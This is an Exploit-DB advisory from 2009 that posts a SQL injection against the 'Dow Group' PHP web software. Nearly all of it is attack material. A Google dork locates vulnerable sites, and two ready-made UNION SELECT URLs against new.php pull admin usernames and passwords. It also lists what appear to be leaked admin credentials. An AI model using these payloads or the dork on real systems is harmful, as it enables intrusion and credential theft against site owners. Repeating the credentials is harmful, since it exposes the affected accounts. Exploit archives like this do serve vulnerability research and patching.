Dow Group new.php SQL Injection

2009-11-16T00:00:00
ID EDB-ID:9491
Type exploitdb
Reporter ProF.Code
Modified 2009-11-16T00:00:00

Description

Dow Group (new.php) SQL Injection. Webapps exploit for php platform

                                        
                                            =====================================
| Dow Group admin by pass (new.php)
=====================================
Author:ProF.Code
Email :adt@hotmail.com
=====================================
~~~~~~~~~~~~~~~~~~~~
dork(google) : intext:"powered and designed by Dow Group"
~~~~~~~~~~~~~~~~~~~~
demo (username): http://server/new.php?id=-9+union+select+1,user_name,3,4+from+admin
demo (password) : http://server/new.php?id=-9+union+select+1,password,3,4+from+admin
user : nabadmin
pass : nabadmin_123
=============================================================

#====GreeTZ===============#
#all my friends in my email #
#======================#